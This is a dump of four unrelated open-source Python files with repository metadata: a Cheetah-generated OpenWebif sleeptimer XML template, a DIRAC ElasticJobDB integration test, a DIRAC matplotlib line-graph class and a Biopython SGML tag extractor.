' %s. Templates compiled before version %s must be recompiled.'%(
__CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
class sleeptimer(Template):
##################################################
## CHEETAH GENERATED METHODS
def __init__(self, *args, **KWs):
super(sleeptimer, self).__init__(*args, **KWs)
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
def respond(self, trans=None):
## CHEETAH: main method generated for this template
if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
trans = self.transaction # is None unless self.awake() was called
if not trans:
trans = DummyTransaction()
_dummyTrans = True
else: _dummyTrans = False
write = trans.response().write
SL = self._CHEETAH__searchList
_filter = self._CHEETAH__currentFilter
########################################
## START - generated method body
_orig_filter_64212376 = _filter
filterName = u'WebSafe'
if self._CHEETAH__filters.has_key("WebSafe"):
_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
else:
_filter = self._CHEETAH__currentFilter = \
self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2sleeptimer>
\t<e2enabled>''')
_v = VFFSL(SL,"enabled",True) # u'$enabled' on line 4, col 13
if _v is not None: write(_filter(_v, rawExpr=u'$enabled')) # from line 4, col 13.
write(u'''</e2enabled>
\t<e2minutes>''')
_v = VFFSL(SL,"minutes",True) # u'$minutes' on line 5, col 13
if _v is not None: write(_filter(_v, rawExpr=u'$minutes')) # from line 5, col 13.
write(u'''</e2minutes>
\t<e2action>''')
_v = VFFSL(SL,"action",True) # u'$action' on line 6, col 12
if _v is not None: write(_filter(_v, rawExpr=u'$action')) # from line 6, col 12.
write(u'''</e2action>
\t<e2text>''')
_v = VFFSL(SL,"message",True) # u'$message' on line 7, col 10
if _v is not None: write(_filter(_v, rawExpr=u'$message')) # from line 7, col 10.
write(u'''</e2text>
</e2sleeptimer>
''')
_filter = self._CHEETAH__currentFilter = _orig_filter_64212376
########################################
## END - generated method body
return _dummyTrans and trans.response().getvalue() or ""
##################################################
## CHEETAH GENERATED ATTRIBUTES
_CHEETAH__instanceInitialized = False
_CHEETAH_version = __CHEETAH_version__
_CHEETAH_versionTuple = __CHEETAH_versionTuple__
_CHEETAH_genTime = __CHEETAH_genTime__
_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
_CHEETAH_src = __CHEETAH_src__
_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
_mainCheetahMethod_for_sleeptimer= 'respond'
## END CLASS DEFINITION
if not hasattr(sleeptimer, '_initCheetahAttributes'):
templateAPIClass = getattr(sleeptimer, '_CHEETAH_templateClass', Template)
templateAPIClass._addCheetahPlumbingCodeToClass(sleeptimer)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
if __name__ == '__main__':
from Cheetah.TemplateCmdLineIface import CmdLineIface
CmdLineIface(templateObj=sleeptimer()).run()
|
MOA-2011/enigma2-plugin-extensions-openwebif
|
plugin/controllers/views/web/sleeptimer.py
|
Python
|
gpl-2.0
| 5,628
|
[
"VisIt"
] |
3c43abbc986cbaf6db3be02c4121dd2026fe71f7ee524c9103cb5f9b6be7e1f8
|
""" This tests only need the JobElasticDB, and connects directly to it
"""
import unittest
import time
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.WorkloadManagementSystem.DB.ElasticJobDB import ElasticJobDB
class JobDBTestCase(unittest.TestCase):
""" Base class for the JobElasticDB test cases
"""
def setUp(self):
gLogger.setLevel('DEBUG')
self.jobDB = ElasticJobDB()
def tearDown(self):
self.jobDB = False
class JobParametersCase(JobDBTestCase):
""" TestJobElasticDB represents a test suite for the JobElasticDB database front-end
"""
def test_setAndGetJobFromDB(self):
"""
test_setAndGetJobFromDB tests the functions setJobParameter and getJobParameters in
WorkloadManagementSystem/DB/JobElasticDB.py
Test Values:
100: JobID (int)
DIRAC: Name (basestring)
dirac@cern: Value (basestring)
"""
res = self.jobDB.setJobParameter(100, 'DIRAC', 'dirac@cern')
self.assertTrue(res['OK'])
time.sleep(1)
res = self.jobDB.getJobParameters(100)
self.assertTrue(res['OK'])
self.assertEqual(res['Value']['DIRAC'], 'dirac@cern')
res = self.jobDB.getJobParametersAndAttributes(100)
self.assertTrue(res['OK'])
self.assertEqual(res['Value'][100]['Name'], 'DIRAC')
if __name__ == '__main__':
suite = unittest.defaultTestLoader.loadTestsFromTestCase(JobParametersCase)
testResult = unittest.TextTestRunner(verbosity=2).run(suite)
|
chaen/DIRAC
|
tests/Integration/WorkloadManagementSystem/Test_ElasticJobDB.py
|
Python
|
gpl-3.0
| 1,491
|
[
"DIRAC"
] |
248a070e77bccd101afbc3a1ddb9c51fb9a3b8a9804c145bbe6ddfc37c349f7e
|
########################################################################
# $HeadURL$
########################################################################
""" LineGraph represents line graphs both simple and stacked. It includes
also cumulative graph functionality.
The DIRAC Graphs package is derived from the GraphTool plotting package of the
CMS/Phedex Project by ... <to be added>
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Utilities.Graphs.PlotBase import PlotBase
from DIRAC.Core.Utilities.Graphs.GraphUtilities import to_timestamp, PrettyDateLocator, \
PrettyDateFormatter, PrettyScalarFormatter
from matplotlib.patches import Polygon
from matplotlib.dates import date2num
import datetime
class LineGraph( PlotBase ):
"""
The LineGraph class is a straightforward line graph; given a dictionary
of values, it takes the keys as the independent variable and the values
as the dependent variable.
"""
def __init__(self,data,ax,prefs,*args,**kw):
PlotBase.__init__(self,data,ax,prefs,*args,**kw)
def draw( self ):
PlotBase.draw(self)
self.x_formatter_cb(self.ax)
if self.gdata.isEmpty():
return None
tmp_x = []; tmp_y = []
labels = self.gdata.getLabels()
nKeys = self.gdata.getNumberOfKeys()
tmp_b = []
for n in range(nKeys):
if 'log_yaxis' in self.prefs:
tmp_b.append(0.001)
else:
tmp_b.append(0.)
start_plot = 0
end_plot = 0
if "starttime" in self.prefs and "endtime" in self.prefs:
start_plot = date2num( datetime.datetime.fromtimestamp(to_timestamp(self.prefs['starttime'])))
end_plot = date2num( datetime.datetime.fromtimestamp(to_timestamp(self.prefs['endtime'])))
self.polygons = []
seq_b = [(self.gdata.max_num_key,0.0),(self.gdata.min_num_key,0.0)]
zorder = 0.0
labels = self.gdata.getLabels()
labels.reverse()
# If it is a simple plot, no labels are used
# Evaluate the most appropriate color in this case
if self.gdata.isSimplePlot():
labels = [('SimplePlot',0.)]
color = self.prefs.get('plot_color','Default')
if color.find('#') != -1:
self.palette.setColor('SimplePlot',color)
else:
labels = [(color,0.)]
for label,num in labels:
color = self.palette.getColor(label)
ind = 0
tmp_x = []
tmp_y = []
plot_data = self.gdata.getPlotNumData(label)
for key, value, error in plot_data:
if value is None:
value = 0.
tmp_x.append( key )
tmp_y.append( float(value)+tmp_b[ind] )
ind += 1
seq_t = zip(tmp_x,tmp_y)
seq = seq_t+seq_b
poly = Polygon( seq, facecolor=color, fill=True, linewidth=.2, zorder=zorder)
self.ax.add_patch( poly )
self.polygons.append( poly )
tmp_b = list(tmp_y)
zorder -= 0.1
ymax = max( tmp_b ); ymax *= 1.1
ymin = min( tmp_b, 0. ); ymin *= 1.1
if 'log_yaxis' in self.prefs:
ymin = 0.001
xmax=max(tmp_x)
if self.log_xaxis:
xmin = 0.001
else:
xmin = 0
ymin = self.prefs.get( 'ymin', ymin )
ymax = self.prefs.get( 'ymax', ymax )
xmin = self.prefs.get( 'xmin', xmin )
xmax = self.prefs.get( 'xmax', xmax )
self.ax.set_xlim( xmin=xmin, xmax=xmax )
self.ax.set_ylim( ymin=ymin, ymax=ymax )
if self.gdata.key_type == 'time':
if start_plot and end_plot:
self.ax.set_xlim( xmin=start_plot, xmax=end_plot)
else:
self.ax.set_xlim( xmin=min(tmp_x), xmax=max(tmp_x))
def x_formatter_cb( self, ax ):
if self.gdata.key_type == "string":
smap = self.gdata.getStringMap()
reverse_smap = {}
for key, val in smap.items():
reverse_smap[val] = key
ticks = smap.values()
ticks.sort()
ax.set_xticks( [i+.5 for i in ticks] )
ax.set_xticklabels( [reverse_smap[i] for i in ticks] )
ax.grid( False )
if self.log_xaxis:
xmin = 0.001
else:
xmin = 0
ax.set_xlim( xmin=xmin,xmax=len(ticks) )
elif self.gdata.key_type == "time":
dl = PrettyDateLocator()
df = PrettyDateFormatter( dl )
ax.xaxis.set_major_locator( dl )
ax.xaxis.set_major_formatter( df )
ax.xaxis.set_clip_on(False)
sf = PrettyScalarFormatter( )
ax.yaxis.set_major_formatter( sf )
else:
return None
|
arrabito/DIRAC
|
Core/Utilities/Graphs/LineGraph.py
|
Python
|
gpl-3.0
| 4,402
|
[
"DIRAC"
] |
ac5e76a08710921b142c456cb6066e88cd27e95904f7ecbdc9a0e7515683ff01
|
# Copyright 2002 by Katharine Lindner. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Code for more fancy file handles.
Classes:
SGMLExtractorHandle File object that strips tags and returns content from specified
tags blocks.
SGMLExtractor Object that scans for specified SGML tag pairs, removes any inner tags
and returns the raw content.
For example the object SGMLExtractor( [ 'h1' ] )on the following html file would return
'House that Jack built'
SGMLExtractor( [ 'dt' ] ) would return 'ratcatdogcowmaiden'
SGMLExtractor( [ 'dt', 'dd' ] ) would return 'rat that ate the malttcat ate the rat' etc
<h1>House that Jack Built</h1>
<dl>
<dt><big>rat</big></dt>
<dd><big>ate the malt</big></dd>
<dt><big>cat</big></dt>
<dd><big>that ate the rat</big></dd>
<dt><big>dog</big></dt>
<dd><big>that worried the dats</big></dd>
<dt><big>cow</big></dt>
<dd><big>with crumpled horn</big></dd>
<dt><big>maiden</big></dt>
<dd><big>all forlorns</big></dd>
</dl>
"""
import os
import string
import StringIO
import sgmllib
class SGMLExtractorHandle:
"""A Python handle that automatically strips SGML tags and returns data from
specified tag start and end pairs.
"""
def __init__(self, handle, tags_of_interest = [] ):
"""SGMLExtractor(handle, tags_of_interest )
handle is a file handle to SGML-formatted data.
tags_of_interest is a list of root names for pairs of start and end tags
"""
self._handle = handle
self._stripper = SGMLExtractor( tags_of_interest )
def read(self, *args, **keywds):
data = self._handle.read( *args, **keywds)
return self._stripper.strip(data)
def readline(self, *args, **keywds):
line = self._handle.readline( *args, **keywds)
return self._stripper.strip(line)
def readlines(self, *args, **keywds):
lines = self._handle.readlines( *args, **keywds)
for i in range(len(lines)):
lines[i] = self._stripper.strip(str)
return lines
def __getattr__(self, attr):
return getattr(self._handle, attr)
def is_empty( items ):
if( len( items ) > 0 ):
return 0
else:
return 1
class SGMLExtractor:
class LocalParser(sgmllib.SGMLParser):
def __init__(self, tags_of_interest = [] ):
sgmllib.SGMLParser.__init__(self)
self.data = ''
self._instack = []
self._tags_of_interest = []
for tag in tags_of_interest:
self._tags_of_interest.append( tag.lower() )
def handle_data(self, data):
if( not is_empty( self._instack ) ):
self.data = self.data + data
def unknown_starttag(self, tag, attrs):
lower_tag = tag.lower()
if( lower_tag in self._tags_of_interest ):
self._instack.append( lower_tag )
def unknown_endtag(self, tag ):
if( not is_empty( self._instack ) ):
open_tag = self._instack.pop()
try:
if( open_tag != tag.lower() ):
self._instack.append( open_tag )
except:
print tag
def __init__(self, tags_of_interest = [] ):
self._parser = SGMLExtractor.LocalParser( tags_of_interest )
def strip(self, str):
"""S.strip(str) -> string
Strip the SGML tags from str.
"""
if not str: # empty string, don't do anything.
return ''
# I need to make sure that I don't return an empty string if
# the buffer is not empty. This can happen if there's a newline
# character embedded within a tag. Thus, I'll first check to
# see if the last character is a newline. If it is, and it's stripped
# away, I'll add it back.
is_newline = str[-1] in ['\n', '\r']
self._parser.data = '' # clear the parser's data (don't reset)
self._parser.feed(str)
if self._parser.data:
str = self._parser.data
elif is_newline:
str = '\n'
return str
|
dbmi-pitt/DIKB-Micropublication
|
scripts/mp-scripts/Bio/SGMLExtractor.py
|
Python
|
apache-2.0
| 4,278
|
[
"Biopython"
] |
906b4363315275fbea7db6a3b0a20651b186dd9f9950e679d792337efc3333ee
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.